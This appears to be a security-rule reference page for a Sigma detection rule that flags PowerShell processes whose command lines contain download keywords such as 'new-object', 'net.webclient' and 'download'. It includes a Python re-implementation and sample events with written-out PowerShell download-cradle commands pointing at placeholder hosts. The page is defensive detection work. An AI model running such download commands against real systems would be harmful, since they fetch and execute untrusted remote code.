PowerShell Download Pattern

Sigma Rules

Summary
This detection rule identifies potentially malicious PowerShell activity by monitoring process creation events. It alerts when a PowerShell process ('powershell.exe' or 'pwsh.exe') is launched with command-line arguments associated with downloading files. The rule looks for strings such as 'new-object', 'net.webclient' and 'download', which are frequently used in PowerShell scripts for network activity and may indicate an attempt to retrieve potentially harmful content from the internet. The process criterion and the command-line criterion are combined in a multi-condition selection, so only executions that satisfy both are flagged. False positives may occur due to unknown factors, but the rule is considered reliable enough to warrant a medium level of concern, given the risks of PowerShell misuse in cyber attacks.
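As an added illustration of the selection logic the summary describes (this is not the Sigma project's own code or the rule's YAML), the following Python re-implements the two-part match over a few constructed Sysmon-style process-creation events. It assumes the field names 'Image' and 'CommandLine', that the image check is a suffix match on the two binaries, and that all three command-line keywords must be present, compared case-insensitively as Sigma's default string matching is.

```python
"""Toy re-implementation of the 'PowerShell Download Pattern' selection.

Added example; not the Sigma project's code. Assumes Sysmon-style
process-creation fields ('Image', 'CommandLine') and that the PowerShell
image AND all three keywords are required, as the rule summary states.
"""
from typing import Dict, Iterable, List

# Image names the rule watches (summary: powershell.exe or pwsh.exe)
POWERSHELL_IMAGES = ("\\powershell.exe", "\\pwsh.exe")

# Command-line fragments the rule requires ('contains|all' semantics assumed,
# matched case-insensitively like Sigma's default string modifiers)
DOWNLOAD_KEYWORDS = ("new-object", "net.webclient", "download")


def is_powershell_image(image: str) -> bool:
    """True when the process image path ends with one of the watched binaries."""
    return image.lower().endswith(POWERSHELL_IMAGES)


def has_download_pattern(command_line: str) -> bool:
    """True when every required keyword appears somewhere in the command line."""
    cl = command_line.lower()
    return all(kw in cl for kw in DOWNLOAD_KEYWORDS)


def matches_rule(event: Dict[str, str]) -> bool:
    """Evaluate the combined selection against one process-creation event."""
    return is_powershell_image(event.get("Image", "")) and has_download_pattern(
        event.get("CommandLine", "")
    )


def scan(events: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return the events that would raise an alert under this rule."""
    return [e for e in events if matches_rule(e)]


# Constructed sample events (not real telemetry; hosts use .invalid TLD)
SAMPLE_EVENTS = [
    {   # matches: powershell.exe with all three keywords
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "CommandLine": "powershell.exe -nop -c \"(New-Object Net.WebClient)"
                       ".DownloadString('http://example.invalid/a.ps1')\"",
    },
    {   # matches: pwsh.exe, keywords in a different letter case
        "Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe",
        "CommandLine": "pwsh -c \"$w = NEW-OBJECT NET.WEBCLIENT; "
                       "$w.DownloadFile('http://example.invalid/b.bin','b.bin')\"",
    },
    {   # no match: keywords present, but the image is not PowerShell
        "Image": "C:\\Windows\\System32\\cmd.exe",
        "CommandLine": "cmd.exe /c echo new-object net.webclient download",
    },
    {   # no match: PowerShell image, but a different download cmdlet;
        # this rule does not cover it, so a complementary rule is needed
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "CommandLine": "powershell.exe -c \"Invoke-WebRequest "
                       "-Uri http://example.invalid/c.txt -OutFile c.txt\"",
    },
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print("ALERT:", hit["CommandLine"])
```

The third and fourth sample events show the two sides of the rule's precision: the image check keeps the keywords from firing on non-PowerShell processes, while the keyword check is specific to the WebClient pattern and leaves other download mechanisms to other rules.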
Categories
  • Endpoint
  • Windows
Data Sources
  • Process
Created: 2019-01-16